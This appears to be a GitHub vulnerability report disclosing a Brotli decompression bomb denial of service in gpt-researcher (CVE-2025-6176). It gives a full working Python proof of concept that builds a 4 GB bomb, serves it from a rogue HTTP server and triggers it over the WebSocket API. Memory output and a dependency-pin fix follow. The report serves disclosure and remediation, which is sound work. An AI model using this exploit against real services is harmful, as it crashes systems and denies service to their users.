Describe the bug
gpt-researcher is vulnerable to a Brotli decompression bomb DoS (CVE-2025-6176). When the scraper fetches a URL that returns Content-Encoding: br with a malicious payload, urllib3 decompresses it without any output size limit. A ~6 KB compressed payload expands to 4 GB+ in memory, causing OOM.
Attack path:
WebSocket API (source_urls=["http://evil.com"])
→ BeautifulSoupScraper.scrape() → requests.get(url)
→ urllib3 (Accept-Encoding: gzip, deflate, br)
→ brotli.decompress(6 KB → 4 GB) → OOM
Root cause: brotli < 1.2.0 has no decompression output size validation.
To Reproduce
- Install gpt-researcher with
brotli==1.1.0, start the server (--network host)
- Run the PoC below
- Observe memory: ~150 MB → 7.4 GB
#!/usr/bin/env python3
"""CVE-2025-6176 — Brotli decompression bomb DoS against gpt-researcher"""
import http.server, json, subprocess, sys, threading, time, urllib.request
CONTAINER = "gpt-researcher"
SERVICE = "http://127.0.0.1:8000"
WS_URL = "ws://127.0.0.1:8000/ws"
PORT = 19999
BOMB_MB = 4096
def log(msg): print(f"[*] {msg}")
def mem():
r = subprocess.run(["docker", "stats", CONTAINER, "--no-stream", "--format", "{{.MemUsage}}"], capture_output=True, text=True)
return r.stdout.strip() or "N/A"
def running():
r = subprocess.run(["docker", "inspect", "-f", "{{.State.Running}}", CONTAINER], capture_output=True, text=True)
return r.stdout.strip() == "true"
# 1. Generate brotli bomb
log(f"Generating {BOMB_MB}MB bomb ...")
r = subprocess.run(
["docker", "exec", CONTAINER, "python3", "-c",
f"import brotli,sys; sys.stdout.buffer.write(brotli.compress(b'\\x00'*({BOMB_MB}*1024*1024), quality=11))"],
capture_output=True, timeout=300)
bomb = r.stdout
log(f"Bomb: {len(bomb)} bytes -> {BOMB_MB} MB (ratio {BOMB_MB*1024*1024//len(bomb)}x)")
# 2. Malicious HTTP server
class H(http.server.BaseHTTPRequestHandler):
def do_GET(self):
log("Victim fetched bomb!")
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Encoding", "br")
self.send_header("Content-Length", str(len(bomb)))
self.end_headers()
self.wfile.write(bomb)
def do_HEAD(self):
self.send_response(200); self.send_header("Content-Type","text/html"); self.end_headers()
def log_message(self, *a): pass
srv = http.server.HTTPServer(("0.0.0.0", PORT), H)
threading.Thread(target=srv.serve_forever, daemon=True).start()
# 3. Trigger via WebSocket API
try: import websocket
except ImportError:
subprocess.run([sys.executable, "-m", "pip", "install", "websocket-client", "-q"])
import websocket
url = f"http://127.0.0.1:{PORT}/"
log(f"Memory before: {mem()}")
ws = websocket.WebSocket()
ws.connect(WS_URL)
ws.settimeout(10)
ws.send("start " + json.dumps({
"task": "Summarize the content on this page",
"report_type": "research_report", "report_source": "web",
"tone": "Objective", "source_urls": [url],
"document_urls": [], "headers": {}, "query_domains": [],
"mcp_enabled": False, "mcp_strategy": "fast", "mcp_configs": [],
}))
# 4. Monitor
done = threading.Event()
def watch():
while not done.is_set():
time.sleep(3)
if not running(): log("CONTAINER CRASHED!"); break
log(f" mem={mem()} alive={running()}")
threading.Thread(target=watch, daemon=True).start()
while True:
try:
msg = ws.recv()
if not msg: break
d = json.loads(msg) if msg.startswith("{") else {}
out = d.get("output", d.get("content", ""))
if out: log(f" ws: {str(out)[:120]}")
except: break
ws.close()
done.set(); time.sleep(2); srv.shutdown()
log(f"Container running: {running()} Memory: {mem()}")
if not running():
ec = subprocess.run(["docker", "inspect", "-f", "{{.State.ExitCode}}", CONTAINER], capture_output=True, text=True).stdout.strip()
log(f"Exit code: {ec} (137=OOM)")
Output:
[*] Bomb: 6721 bytes -> 4096 MB (ratio 639036x)
[*] Memory before: 109.6MiB
[*] ws: ✅ Added source url to research: http://127.0.0.1:19999/
[*] ws: 🌐 Scraping content from 1 URLs...
[*] Victim fetched bomb!
[*] mem=3.83GiB alive=True
[*] mem=5.555GiB alive=True
[*] mem=6.724GiB alive=True
[*] Container running: True Memory: 7.403GiB
With --memory limit on the container or a larger bomb (64 GB as in the original CVE PoC), this results in OOM kill (exit code 137).
Suggested fix
Pin brotli >= 1.2.0 which includes decompression size validation:
- "brotli>=1.1.0",
+ "brotli>=1.2.0",
Environment
- gpt-researcher 0.14.6, brotli 1.1.0, requests 2.32.3, urllib3 2.4.0, Python 3.12, Ubuntu 22.04
Describe the bug
gpt-researcher is vulnerable to a Brotli decompression bomb DoS (CVE-2025-6176). When the scraper fetches a URL that returns
Content-Encoding: brwith a malicious payload,urllib3decompresses it without any output size limit. A ~6 KB compressed payload expands to 4 GB+ in memory, causing OOM.Attack path:
Root cause:
brotli < 1.2.0has no decompression output size validation.To Reproduce
brotli==1.1.0, start the server (--network host)Output:
With
--memorylimit on the container or a larger bomb (64 GB as in the original CVE PoC), this results in OOM kill (exit code 137).Suggested fix
Pin
brotli >= 1.2.0which includes decompression size validation:Environment